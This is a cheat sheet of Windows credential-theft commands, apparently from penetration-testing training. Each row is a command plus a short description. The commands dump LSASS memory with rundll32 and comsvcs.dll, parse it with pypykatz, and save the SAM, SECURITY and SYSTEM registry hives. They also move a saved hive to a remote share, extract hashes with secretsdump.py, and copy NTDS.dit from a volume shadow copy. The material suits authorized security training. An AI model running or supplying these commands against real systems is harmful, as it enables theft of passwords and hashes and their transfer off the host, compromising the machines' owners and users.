Windows Local Password Attacks
| Command | Description |
| --- | --- |
| `tasklist /svc` | A command-line utility in Windows used to list running processes and the services hosted by each. |
| `findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml` | Uses the Windows command-line utility findstr to search for the string "password" in many different file types. |
| `Get-Process lsass` | A PowerShell cmdlet used to display process information. Using this with the LSASS process can be helpful when attempting to dump LSASS process memory from the command line. |
| `rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full` | Uses rundll32 in Windows to create an LSASS memory dump file. This file can then be transferred to an attack box to extract credentials. |
| `pypykatz lsa minidump /path/to/lsassdumpfile` | Uses Pypykatz to parse and attempt to extract credentials and password hashes from an LSASS process memory dump file. |
| `reg.exe save hklm\sam C:\sam.save` | Uses reg.exe in Windows to save a copy of a registry hive at a specified location on the file system. It can be used to make copies of any registry hive (e.g., hklm\sam, hklm\security, hklm\system). |
| `move sam.save \\<ip>\NameofFileShare` | Uses move in Windows to transfer a file to a specified file share over the network. |
| `python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL` | Uses secretsdump.py to dump password hashes from the SAM database. |
| `vssadmin CREATE SHADOW /For=C:` | Uses the Windows command-line tool vssadmin to create a volume shadow copy for C:. This can be used to make a copy of NTDS.dit safely. |
| `cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit` | Uses the Windows command-line tool copy to create a copy of NTDS.dit from a volume shadow copy of C:. |